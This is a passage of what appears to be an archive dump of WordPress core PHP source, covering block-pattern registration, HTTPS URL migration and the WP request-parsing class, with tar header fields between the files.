if ( isset( $pattern['viewport_width'] ) ) {
$pattern['viewportWidth'] = $pattern['viewport_width'];
unset( $pattern['viewport_width'] );
}
return (array) $pattern;
}
/**
* Register Core's official patterns from wordpress.org/patterns.
*
* @since 5.8.0
* @since 5.9.0 The $current_screen argument was removed.
* @since 6.2.0 Normalize the pattern from the API (snake_case) to the
* format expected by `register_block_pattern` (camelCase).
* @since 6.3.0 Add 'pattern-directory/core' to the pattern's 'source'.
*
* @param WP_Screen $deprecated Unused. Formerly the screen that the current request was triggered from.
*/
function _load_remote_block_patterns( $deprecated = null ) {
if ( ! empty( $deprecated ) ) {
_deprecated_argument( __FUNCTION__, '5.9.0' );
$current_screen = $deprecated;
if ( ! $current_screen->is_block_editor ) {
return;
}
}
$supports_core_patterns = get_theme_support( 'core-block-patterns' );
/**
* Filter to disable remote block patterns.
*
* @since 5.8.0
*
* @param bool $should_load_remote
*/
$should_load_remote = apply_filters( 'should_load_remote_block_patterns', true );
if ( $supports_core_patterns && $should_load_remote ) {
$request = new WP_REST_Request( 'GET', '/wp/v2/pattern-directory/patterns' );
$core_keyword_id = 11; // 11 is the ID for "core".
$request->set_param( 'keyword', $core_keyword_id );
$response = rest_do_request( $request );
if ( $response->is_error() ) {
return;
}
$patterns = $response->get_data();
foreach ( $patterns as $pattern ) {
$pattern['source'] = 'pattern-directory/core';
$normalized_pattern = wp_normalize_remote_block_pattern( $pattern );
$pattern_name = 'core/' . sanitize_title( $normalized_pattern['title'] );
register_block_pattern( $pattern_name, $normalized_pattern );
}
}
}
/**
* Register `Featured` (category) patterns from wordpress.org/patterns.
*
* @since 5.9.0
* @since 6.2.0 Normalized the pattern from the API (snake_case) to the
* format expected by `register_block_pattern()` (camelCase).
* @since 6.3.0 Add 'pattern-directory/featured' to the pattern's 'source'.
*/
function _load_remote_featured_patterns() {
$supports_core_patterns = get_theme_support( 'core-block-patterns' );
/** This filter is documented in wp-includes/block-patterns.php */
$should_load_remote = apply_filters( 'should_load_remote_block_patterns', true );
if ( ! $should_load_remote || ! $supports_core_patterns ) {
return;
}
$request = new WP_REST_Request( 'GET', '/wp/v2/pattern-directory/patterns' );
$featured_cat_id = 26; // This is the `Featured` category id from pattern directory.
$request->set_param( 'category', $featured_cat_id );
$response = rest_do_request( $request );
if ( $response->is_error() ) {
return;
}
$patterns = $response->get_data();
$registry = WP_Block_Patterns_Registry::get_instance();
foreach ( $patterns as $pattern ) {
$pattern['source'] = 'pattern-directory/featured';
$normalized_pattern = wp_normalize_remote_block_pattern( $pattern );
$pattern_name = sanitize_title( $normalized_pattern['title'] );
// Some patterns might be already registered as core patterns with the `core` prefix.
$is_registered = $registry->is_registered( $pattern_name ) || $registry->is_registered( "core/$pattern_name" );
if ( ! $is_registered ) {
register_block_pattern( $pattern_name, $normalized_pattern );
}
}
}
/**
* Registers patterns from Pattern Directory provided by a theme's
* `theme.json` file.
*
* @since 6.0.0
* @since 6.2.0 Normalized the pattern from the API (snake_case) to the
* format expected by `register_block_pattern()` (camelCase).
* @since 6.3.0 Add 'pattern-directory/theme' to the pattern's 'source'.
* @access private
*/
function _register_remote_theme_patterns() {
/** This filter is documented in wp-includes/block-patterns.php */
if ( ! apply_filters( 'should_load_remote_block_patterns', true ) ) {
return;
}
if ( ! wp_theme_has_theme_json() ) {
return;
}
$pattern_settings = wp_get_theme_directory_pattern_slugs();
if ( empty( $pattern_settings ) ) {
return;
}
$request = new WP_REST_Request( 'GET', '/wp/v2/pattern-directory/patterns' );
$request['slug'] = $pattern_settings;
$response = rest_do_request( $request );
if ( $response->is_error() ) {
return;
}
$patterns = $response->get_data();
$patterns_registry = WP_Block_Patterns_Registry::get_instance();
foreach ( $patterns as $pattern ) {
$pattern['source'] = 'pattern-directory/theme';
$normalized_pattern = wp_normalize_remote_block_pattern( $pattern );
$pattern_name = sanitize_title( $normalized_pattern['title'] );
// Some patterns might be already registered as core patterns with the `core` prefix.
$is_registered = $patterns_registry->is_registered( $pattern_name ) || $patterns_registry->is_registered( "core/$pattern_name" );
if ( ! $is_registered ) {
register_block_pattern( $pattern_name, $normalized_pattern );
}
}
}
/**
* Register any patterns that the active theme may provide under its
* `./patterns/` directory.
*
* @since 6.0.0
* @since 6.1.0 The `postTypes` property was added.
* @since 6.2.0 The `templateTypes` property was added.
* @since 6.4.0 Uses the `WP_Theme::get_block_patterns` method.
* @access private
*/
function _register_theme_block_patterns() {
/*
* During the bootstrap process, a check for active and valid themes is run.
* If no themes are returned, the theme's functions.php file will not be loaded,
* which can lead to errors if patterns expect some variables or constants to
* already be set at this point, so bail early if that is the case.
*/
if ( empty( wp_get_active_and_valid_themes() ) ) {
return;
}
/*
* Register patterns for the active theme. If the theme is a child theme,
* let it override any patterns from the parent theme that shares the same slug.
*/
$themes = array();
$theme = wp_get_theme();
$themes[] = $theme;
if ( $theme->parent() ) {
$themes[] = $theme->parent();
}
$registry = WP_Block_Patterns_Registry::get_instance();
foreach ( $themes as $theme ) {
$patterns = $theme->get_block_patterns();
$dirpath = $theme->get_stylesheet_directory() . '/patterns/';
$text_domain = $theme->get( 'TextDomain' );
foreach ( $patterns as $file => $pattern_data ) {
if ( $registry->is_registered( $pattern_data['slug'] ) ) {
continue;
}
$file_path = $dirpath . $file;
if ( ! file_exists( $file_path ) ) {
_doing_it_wrong(
__FUNCTION__,
sprintf(
/* translators: %s: file name. */
__( 'Could not register file "%s" as a block pattern as the file does not exist.' ),
$file
),
'6.4.0'
);
$theme->delete_pattern_cache();
continue;
}
$pattern_data['filePath'] = $file_path;
// Translate the pattern metadata.
// phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralText,WordPress.WP.I18n.NonSingularStringLiteralDomain,WordPress.WP.I18n.LowLevelTranslationFunction
$pattern_data['title'] = translate_with_gettext_context( $pattern_data['title'], 'Pattern title', $text_domain );
if ( ! empty( $pattern_data['description'] ) ) {
// phpcs:ignore WordPress.WP.I18n.NonSingularStringLiteralText,WordPress.WP.I18n.NonSingularStringLiteralDomain,WordPress.WP.I18n.LowLevelTranslationFunction
$pattern_data['description'] = translate_with_gettext_context( $pattern_data['description'], 'Pattern description', $text_domain );
}
register_block_pattern( $pattern_data['slug'], $pattern_data );
}
}
}
add_action( 'init', '_register_theme_block_patterns' );
https-migration-20260605172929.php 0000666 00000011205 15224151220 0012003 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class-wp-20260621145625.php 0000666 00000063561 15224151220 0010406 0 ustar 00 <?php
/**
* WordPress environment setup class.
*
* @package WordPress
* @since 2.0.0
*/
#[AllowDynamicProperties]
class WP {
/**
* Public query variables.
*
* Long list of public query variables.
*
* @since 2.0.0
* @var string[]
*/
public $public_query_vars = array( 'm', 'p', 'posts', 'w', 'cat', 'withcomments', 'withoutcomments', 's', 'search', 'exact', 'sentence', 'calendar', 'page', 'paged', 'more', 'tb', 'pb', 'author', 'order', 'orderby', 'year', 'monthnum', 'day', 'hour', 'minute', 'second', 'name', 'category_name', 'tag', 'feed', 'author_name', 'pagename', 'page_id', 'error', 'attachment', 'attachment_id', 'subpost', 'subpost_id', 'preview', 'robots', 'favicon', 'taxonomy', 'term', 'cpage', 'post_type', 'embed' );
/**
* Private query variables.
*
* Long list of private query variables.
*
* @since 2.0.0
* @var string[]
*/
public $private_query_vars = array( 'offset', 'posts_per_page', 'posts_per_archive_page', 'showposts', 'nopaging', 'post_type', 'post_status', 'category__in', 'category__not_in', 'category__and', 'tag__in', 'tag__not_in', 'tag__and', 'tag_slug__in', 'tag_slug__and', 'tag_id', 'post_mime_type', 'perm', 'comments_per_page', 'post__in', 'post__not_in', 'post_parent', 'post_parent__in', 'post_parent__not_in', 'title', 'fields' );
/**
* Extra query variables set by the user.
*
* @since 2.1.0
* @var array
*/
public $extra_query_vars = array();
/**
* Query variables for setting up the WordPress Query Loop.
*
* @since 2.0.0
* @var array
*/
public $query_vars = array();
/**
* String parsed to set the query variables.
*
* @since 2.0.0
* @var string
*/
public $query_string = '';
/**
* The request path, e.g. 2015/05/06.
*
* @since 2.0.0
* @var string
*/
public $request = '';
/**
* Rewrite rule the request matched.
*
* @since 2.0.0
* @var string
*/
public $matched_rule = '';
/**
* Rewrite query the request matched.
*
* @since 2.0.0
* @var string
*/
public $matched_query = '';
/**
* Whether already did the permalink.
*
* @since 2.0.0
* @var bool
*/
public $did_permalink = false;
/**
* Adds a query variable to the list of public query variables.
*
* @since 2.1.0
*
* @param string $qv Query variable name.
*/
public function add_query_var( $qv ) {
if ( ! in_array( $qv, $this->public_query_vars, true ) ) {
$this->public_query_vars[] = $qv;
}
}
/**
* Removes a query variable from a list of public query variables.
*
* @since 4.5.0
*
* @param string $name Query variable name.
*/
public function remove_query_var( $name ) {
$this->public_query_vars = array_diff( $this->public_query_vars, array( $name ) );
}
/**
* Sets the value of a query variable.
*
* @since 2.3.0
*
* @param string $key Query variable name.
* @param mixed $value Query variable value.
*/
public function set_query_var( $key, $value ) {
$this->query_vars[ $key ] = $value;
}
/**
* Parses the request to find the correct WordPress query.
*
* Sets up the query variables based on the request. There are also many
* filters and actions that can be used to further manipulate the result.
*
* @since 2.0.0
* @since 6.0.0 A return value was added.
*
* @global WP_Rewrite $wp_rewrite WordPress rewrite component.
*
* @param array|string $extra_query_vars Set the extra query variables.
* @return bool Whether the request was parsed.
*/
public function parse_request( $extra_query_vars = '' ) {
global $wp_rewrite;
/**
* Filters whether to parse the request.
*
* @since 3.5.0
*
* @param bool $bool Whether or not to parse the request. Default true.
* @param WP $wp Current WordPress environment instance.
* @param array|string $extra_query_vars Extra passed query variables.
*/
if ( ! apply_filters( 'do_parse_request', true, $this, $extra_query_vars ) ) {
return false;
}
$this->query_vars = array();
$post_type_query_vars = array();
if ( is_array( $extra_query_vars ) ) {
$this->extra_query_vars = & $extra_query_vars;
} elseif ( ! empty( $extra_query_vars ) ) {
parse_str( $extra_query_vars, $this->extra_query_vars );
}
// Process PATH_INFO, REQUEST_URI, and 404 for permalinks.
// Fetch the rewrite rules.
$rewrite = $wp_rewrite->wp_rewrite_rules();
if ( ! empty( $rewrite ) ) {
// If we match a rewrite rule, this will be cleared.
$error = '404';
$this->did_permalink = true;
$pathinfo = isset( $_SERVER['PATH_INFO'] ) ? $_SERVER['PATH_INFO'] : '';
list( $pathinfo ) = explode( '?', $pathinfo );
$pathinfo = str_replace( '%', '%25', $pathinfo );
list( $req_uri ) = explode( '?', $_SERVER['REQUEST_URI'] );
$self = $_SERVER['PHP_SELF'];
$home_path = parse_url( home_url(), PHP_URL_PATH );
$home_path_regex = '';
if ( is_string( $home_path ) && '' !== $home_path ) {
$home_path = trim( $home_path, '/' );
$home_path_regex = sprintf( '|^%s|i', preg_quote( $home_path, '|' ) );
}
/*
* Trim path info from the end and the leading home path from the front.
* For path info requests, this leaves us with the requesting filename, if any.
* For 404 requests, this leaves us with the requested permalink.
*/
$req_uri = str_replace( $pathinfo, '', $req_uri );
$req_uri = trim( $req_uri, '/' );
$pathinfo = trim( $pathinfo, '/' );
$self = trim( $self, '/' );
if ( ! empty( $home_path_regex ) ) {
$req_uri = preg_replace( $home_path_regex, '', $req_uri );
$req_uri = trim( $req_uri, '/' );
$pathinfo = preg_replace( $home_path_regex, '', $pathinfo );
$pathinfo = trim( $pathinfo, '/' );
$self = preg_replace( $home_path_regex, '', $self );
$self = trim( $self, '/' );
}
// The requested permalink is in $pathinfo for path info requests and $req_uri for other requests.
if ( ! empty( $pathinfo ) && ! preg_match( '|^.*' . $wp_rewrite->index . '$|', $pathinfo ) ) {
$requested_path = $pathinfo;
} else {
// If the request uri is the index, blank it out so that we don't try to match it against a rule.
if ( $req_uri === $wp_rewrite->index ) {
$req_uri = '';
}
$requested_path = $req_uri;
}
$requested_file = $req_uri;
$this->request = $requested_path;
// Look for matches.
$request_match = $requested_path;
if ( empty( $request_match ) ) {
// An empty request could only match against ^$ regex.
if ( isset( $rewrite['$'] ) ) {
$this->matched_rule = '$';
$query = $rewrite['$'];
$matches = array( '' );
}
} else {
foreach ( (array) $rewrite as $match => $query ) {
// If the requested file is the anchor of the match, prepend it to the path info.
if ( ! empty( $requested_file )
&& str_starts_with( $match, $requested_file )
&& $requested_file !== $requested_path
) {
$request_match = $requested_file . '/' . $requested_path;
}
if ( preg_match( "#^$match#", $request_match, $matches )
|| preg_match( "#^$match#", urldecode( $request_match ), $matches )
) {
if ( $wp_rewrite->use_verbose_page_rules
&& preg_match( '/pagename=\$matches\[([0-9]+)\]/', $query, $varmatch )
) {
// This is a verbose page match, let's check to be sure about it.
$page = get_page_by_path( $matches[ $varmatch[1] ] );
if ( ! $page ) {
continue;
}
$post_status_obj = get_post_status_object( $page->post_status );
if ( ! $post_status_obj->public && ! $post_status_obj->protected
&& ! $post_status_obj->private && $post_status_obj->exclude_from_search
) {
continue;
}
}
// Got a match.
$this->matched_rule = $match;
break;
}
}
}
if ( ! empty( $this->matched_rule ) ) {
// Trim the query of everything up to the '?'.
$query = preg_replace( '!^.+\?!', '', $query );
// Substitute the substring matches into the query.
$query = addslashes( WP_MatchesMapRegex::apply( $query, $matches ) );
$this->matched_query = $query;
// Parse the query.
parse_str( $query, $perma_query_vars );
// If we're processing a 404 request, clear the error var since we found something.
if ( '404' === $error ) {
unset( $error, $_GET['error'] );
}
}
// If req_uri is empty or if it is a request for ourself, unset error.
if ( empty( $requested_path ) || $requested_file === $self
|| str_contains( $_SERVER['PHP_SELF'], 'wp-admin/' )
) {
unset( $error, $_GET['error'] );
if ( isset( $perma_query_vars ) && str_contains( $_SERVER['PHP_SELF'], 'wp-admin/' ) ) {
unset( $perma_query_vars );
}
$this->did_permalink = false;
}
}
/**
* Filters the query variables allowed before processing.
*
* Allows (publicly allowed) query vars to be added, removed, or changed prior
* to executing the query. Needed to allow custom rewrite rules using your own arguments
* to work, or any other custom query variables you want to be publicly available.
*
* @since 1.5.0
*
* @param string[] $public_query_vars The array of allowed query variable names.
*/
$this->public_query_vars = apply_filters( 'query_vars', $this->public_query_vars );
foreach ( get_post_types( array(), 'objects' ) as $post_type => $t ) {
if ( is_post_type_viewable( $t ) && $t->query_var ) {
$post_type_query_vars[ $t->query_var ] = $post_type;
}
}
foreach ( $this->public_query_vars as $wpvar ) {
if ( isset( $this->extra_query_vars[ $wpvar ] ) ) {
$this->query_vars[ $wpvar ] = $this->extra_query_vars[ $wpvar ];
} elseif ( isset( $_GET[ $wpvar ] ) && isset( $_POST[ $wpvar ] )
&& $_GET[ $wpvar ] !== $_POST[ $wpvar ]
) {
wp_die(
__( 'A variable mismatch has been detected.' ),
__( 'Sorry, you are not allowed to view this item.' ),
400
);
} elseif ( isset( $_POST[ $wpvar ] ) ) {
$this->query_vars[ $wpvar ] = $_POST[ $wpvar ];
} elseif ( isset( $_GET[ $wpvar ] ) ) {
$this->query_vars[ $wpvar ] = $_GET[ $wpvar ];
} elseif ( isset( $perma_query_vars[ $wpvar ] ) ) {
$this->query_vars[ $wpvar ] = $perma_query_vars[ $wpvar ];
}
if ( ! empty( $this->query_vars[ $wpvar ] ) ) {
if ( ! is_array( $this->query_vars[ $wpvar ] ) ) {
$this->query_vars[ $wpvar ] = (string) $this->query_vars[ $wpvar ];
} else {
foreach ( $this->query_vars[ $wpvar ] as $vkey => $v ) {
if ( is_scalar( $v ) ) {
$this->query_vars[ $wpvar ][ $vkey ] = (string) $v;
}
}
}
if ( isset( $post_type_query_vars[ $wpvar ] ) ) {
$this->query_vars['post_type'] = $post_type_query_vars[ $wpvar ];
$this->query_vars['name'] = $this->query_vars[ $wpvar ];
}
}
}
// Convert urldecoded spaces back into '+'.
foreach ( get_taxonomies( array(), 'objects' ) as $taxonomy => $t ) {
if ( $t->query_var && isset( $this->query_vars[ $t->query_var ] ) ) {
$this->query_vars[ $t->query_var ] = str_replace( ' ', '+', $this->query_vars[ $t->query_var ] );
}
}
// Don't allow non-publicly queryable taxonomies to be queried from the front end.
if ( ! is_admin() ) {
foreach ( get_taxonomies( array( 'publicly_queryable' => false ), 'objects' ) as $taxonomy => $t ) {
/*
* Disallow when set to the 'taxonomy' query var.
* Non-publicly queryable taxonomies cannot register custom query vars. See register_taxonomy().
*/
if ( isset( $this->query_vars['taxonomy'] ) && $taxonomy === $this->query_vars['taxonomy'] ) {
unset( $this->query_vars['taxonomy'], $this->query_vars['term'] );
}
}
}
// Limit publicly queried post_types to those that are 'publicly_queryable'.
if ( isset( $this->query_vars['post_type'] ) ) {
$queryable_post_types = get_post_types( array( 'publicly_queryable' => true ) );
if ( ! is_array( $this->query_vars['post_type'] ) ) {
if ( ! in_array( $this->query_vars['post_type'], $queryable_post_types, true ) ) {
unset( $this->query_vars['post_type'] );
}
} else {
$this->query_vars['post_type'] = array_intersect( $this->query_vars['post_type'], $queryable_post_types );
}
}
// Resolve conflicts between posts with numeric slugs and date archive queries.
$this->query_vars = wp_resolve_numeric_slug_conflicts( $this->query_vars );
foreach ( (array) $this->private_query_vars as $var ) {
if ( isset( $this->extra_query_vars[ $var ] ) ) {
$this->query_vars[ $var ] = $this->extra_query_vars[ $var ];
}
}
if ( isset( $error ) ) {
$this->query_vars['error'] = $error;
}
/**
* Filters the array of parsed query variables.
*
* @since 2.1.0
*
* @param array $query_vars The array of requested query variables.
*/
$this->query_vars = apply_filters( 'request', $this->query_vars );
/**
* Fires once all query variables for the current request have been parsed.
*
* @since 2.1.0
*
* @param WP $wp Current WordPress environment instance (passed by reference).
*/
do_action_ref_array( 'parse_request', array( &$this ) );
return true;
}
/**
* Sends additional HTTP headers for caching, content type, etc.
*
* Sets the Content-Type header. Sets the 'error' status (if passed) and optionally exits.
* If showing a feed, it will also send Last-Modified, ETag, and 304 status if needed.
*
* @since 2.0.0
* @since 4.4.0 `X-Pingback` header is added conditionally for single posts that allow pings.
* @since 6.1.0 Runs after posts have been queried.
*
* @global WP_Query $wp_query WordPress Query object.
*/
public function send_headers() {
global $wp_query;
$headers = array();
$status = null;
$exit_required = false;
$date_format = 'D, d M Y H:i:s';
if ( is_user_logged_in() ) {
$headers = array_merge( $headers, wp_get_nocache_headers() );
} elseif ( ! empty( $_GET['unapproved'] ) && ! empty( $_GET['moderation-hash'] ) ) {
// Unmoderated comments are only visible for 10 minutes via the moderation hash.
$expires = 10 * MINUTE_IN_SECONDS;
$headers['Expires'] = gmdate( $date_format, time() + $expires );
$headers['Cache-Control'] = sprintf(
'max-age=%d, must-revalidate',
$expires
);
}
if ( ! empty( $this->query_vars['error'] ) ) {
$status = (int) $this->query_vars['error'];
if ( 404 === $status ) {
if ( ! is_user_logged_in() ) {
$headers = array_merge( $headers, wp_get_nocache_headers() );
}
$headers['Content-Type'] = get_option( 'html_type' ) . '; charset=' . get_option( 'blog_charset' );
} elseif ( in_array( $status, array( 403, 500, 502, 503 ), true ) ) {
$exit_required = true;
}
} elseif ( empty( $this->query_vars['feed'] ) ) {
$headers['Content-Type'] = get_option( 'html_type' ) . '; charset=' . get_option( 'blog_charset' );
} else {
// Set the correct content type for feeds.
$type = $this->query_vars['feed'];
if ( 'feed' === $this->query_vars['feed'] ) {
$type = get_default_feed();
}
$headers['Content-Type'] = feed_content_type( $type ) . '; charset=' . get_option( 'blog_charset' );
// We're showing a feed, so WP is indeed the only thing that last changed.
if ( ! empty( $this->query_vars['withcomments'] )
|| str_contains( $this->query_vars['feed'], 'comments-' )
|| ( empty( $this->query_vars['withoutcomments'] )
&& ( ! empty( $this->query_vars['p'] )
|| ! empty( $this->query_vars['name'] )
|| ! empty( $this->query_vars['page_id'] )
|| ! empty( $this->query_vars['pagename'] )
|| ! empty( $this->query_vars['attachment'] )
|| ! empty( $this->query_vars['attachment_id'] )
)
)
) {
$wp_last_modified_post = mysql2date( $date_format, get_lastpostmodified( 'GMT' ), false );
$wp_last_modified_comment = mysql2date( $date_format, get_lastcommentmodified( 'GMT' ), false );
if ( strtotime( $wp_last_modified_post ) > strtotime( $wp_last_modified_comment ) ) {
$wp_last_modified = $wp_last_modified_post;
} else {
$wp_last_modified = $wp_last_modified_comment;
}
} else {
$wp_last_modified = mysql2date( $date_format, get_lastpostmodified( 'GMT' ), false );
}
if ( ! $wp_last_modified ) {
$wp_last_modified = gmdate( $date_format );
}
$wp_last_modified .= ' GMT';
$wp_etag = '"' . md5( $wp_last_modified ) . '"';
$headers['Last-Modified'] = $wp_last_modified;
$headers['ETag'] = $wp_etag;
// Support for conditional GET.
if ( isset( $_SERVER['HTTP_IF_NONE_MATCH'] ) ) {
$client_etag = wp_unslash( $_SERVER['HTTP_IF_NONE_MATCH'] );
} else {
$client_etag = '';
}
if ( isset( $_SERVER['HTTP_IF_MODIFIED_SINCE'] ) ) {
$client_last_modified = trim( $_SERVER['HTTP_IF_MODIFIED_SINCE'] );
} else {
$client_last_modified = '';
}
// If string is empty, return 0. If not, attempt to parse into a timestamp.
$client_modified_timestamp = $client_last_modified ? strtotime( $client_last_modified ) : 0;
// Make a timestamp for our most recent modification.
$wp_modified_timestamp = strtotime( $wp_last_modified );
if ( ( $client_last_modified && $client_etag )
? ( ( $client_modified_timestamp >= $wp_modified_timestamp ) && ( $client_etag === $wp_etag ) )
: ( ( $client_modified_timestamp >= $wp_modified_timestamp ) || ( $client_etag === $wp_etag ) )
) {
$status = 304;
$exit_required = true;
}
}
if ( is_singular() ) {
$post = isset( $wp_query->post ) ? $wp_query->post : null;
// Only set X-Pingback for single posts that allow pings.
if ( $post && pings_open( $post ) ) {
$headers['X-Pingback'] = get_bloginfo( 'pingback_url', 'display' );
}
// Send nocache headers for password protected posts to avoid unwanted caching.
if ( ! empty( $post->post_password ) ) {
$headers = array_merge( $headers, wp_get_nocache_headers() );
}
}
/**
* Filters the HTTP headers before they're sent to the browser.
*
* @since 2.8.0
*
* @param string[] $headers Associative array of headers to be sent.
* @param WP $wp Current WordPress environment instance.
*/
$headers = apply_filters( 'wp_headers', $headers, $this );
if ( ! empty( $status ) ) {
status_header( $status );
}
// If Last-Modified is set to false, it should not be sent (no-cache situation).
if ( isset( $headers['Last-Modified'] ) && false === $headers['Last-Modified'] ) {
unset( $headers['Last-Modified'] );
if ( ! headers_sent() ) {
header_remove( 'Last-Modified' );
}
}
if ( ! headers_sent() ) {
foreach ( (array) $headers as $name => $field_value ) {
header( "{$name}: {$field_value}" );
}
}
if ( $exit_required ) {
exit;
}
/**
* Fires once the requested HTTP headers for caching, content type, etc. have been sent.
*
* The {@see 'wp_finalized_template_enhancement_output_buffer'} action may be used to send
* headers after rendering the template into an output buffer.
*
* @since 2.1.0
*
* @param WP $wp Current WordPress environment instance (passed by reference).
*/
do_action_ref_array( 'send_headers', array( &$this ) );
}
/**
* Sets the query string property based off of the query variable property.
*
* The {@see 'query_string'} filter is deprecated, but still works. Plugins should
* use the {@see 'request'} filter instead.
*
* @since 2.0.0
*/
public function build_query_string() {
$this->query_string = '';
foreach ( (array) array_keys( $this->query_vars ) as $wpvar ) {
if ( '' !== $this->query_vars[ $wpvar ] ) {
$this->query_string .= ( strlen( $this->query_string ) < 1 ) ? '' : '&';
if ( ! is_scalar( $this->query_vars[ $wpvar ] ) ) { // Discard non-scalars.
continue;
}
$this->query_string .= $wpvar . '=' . rawurlencode( $this->query_vars[ $wpvar ] );
}
}
if ( has_filter( 'query_string' ) ) { // Don't bother filtering and parsing if no plugins are hooked in.
/**
* Filters the query string before parsing.
*
* @since 1.5.0
* @deprecated 2.1.0 Use {@see 'query_vars'} or {@see 'request'} filters instead.
*
* @param string $query_string The query string to modify.
*/
$this->query_string = apply_filters_deprecated(
'query_string',
array( $this->query_string ),
'2.1.0',
'query_vars, request'
);
parse_str( $this->query_string, $this->query_vars );
}
}
/**
* Set up the WordPress Globals.
*
* The query_vars property will be extracted to the GLOBALS. So care should
* be taken when naming global variables that might interfere with the
* WordPress environment.
*
* @since 2.0.0
*
* @global WP_Query $wp_query WordPress Query object.
* @global string $query_string Query string for the loop.
* @global array $posts The found posts.
* @global WP_Post|null $post The current post, if available.
* @global string $request The SQL statement for the request.
* @global int $more Only set, if single page or post.
* @global int $single If single page or post. Only set, if single page or post.
* @global WP_User $authordata Only set, if author archive.
*/
public function register_globals() {
global $wp_query;
// Extract updated query vars back into global namespace.
foreach ( (array) $wp_query->query_vars as $key => $value ) {
$GLOBALS[ $key ] = $value;
}
$GLOBALS['query_string'] = $this->query_string;
$GLOBALS['posts'] = & $wp_query->posts;
$GLOBALS['post'] = isset( $wp_query->post ) ? $wp_query->post : null;
$GLOBALS['request'] = $wp_query->request;
if ( $wp_query->is_single() || $wp_query->is_page() ) {
$GLOBALS['more'] = 1;
$GLOBALS['single'] = 1;
}
if ( $wp_query->is_author() ) {
$GLOBALS['authordata'] = get_userdata( get_queried_object_id() );
}
}
/**
* Set up the current user.
*
* @since 2.0.0
*/
public function init() {
wp_get_current_user();
}
/**
* Set up the Loop based on the query variables.
*
* @since 2.0.0
*
* @global WP_Query $wp_the_query WordPress Query object.
*/
public function query_posts() {
global $wp_the_query;
$this->build_query_string();
$wp_the_query->query( $this->query_vars );
}
/**
* Set the Headers for 404, if nothing is found for requested URL.
*
* Issue a 404 if a request doesn't match any posts and doesn't match any object
* (e.g. an existing-but-empty category, tag, author) and a 404 was not already issued,
* and if the request was not a search or the homepage.
*
* Otherwise, issue a 200.
*
* This sets headers after posts have been queried. handle_404() really means "handle status".
* By inspecting the result of querying posts, seemingly successful requests can be switched to
* a 404 so that canonical redirection logic can kick in.
*
* @since 2.0.0
*
* @global WP_Query $wp_query WordPress Query object.
*/
public function handle_404() {
global $wp_query;
/**
* Filters whether to short-circuit default header status handling.
*
* Returning a non-false value from the filter will short-circuit the handling
* and return early.
*
* @since 4.5.0
*
* @param bool $preempt Whether to short-circuit default header status handling. Default false.
* @param WP_Query $wp_query WordPress Query object.
*/
if ( false !== apply_filters( 'pre_handle_404', false, $wp_query ) ) {
return;
}
// If we've already issued a 404, bail.
if ( is_404() ) {
return;
}
$set_404 = true;
// Never 404 for the admin, robots, or favicon.
if ( is_admin() || is_robots() || is_favicon() ) {
$set_404 = false;
// If posts were found, check for paged content.
} elseif ( $wp_query->posts ) {
$content_found = true;
if ( is_singular() ) {
$post = isset( $wp_query->post ) ? $wp_query->post : null;
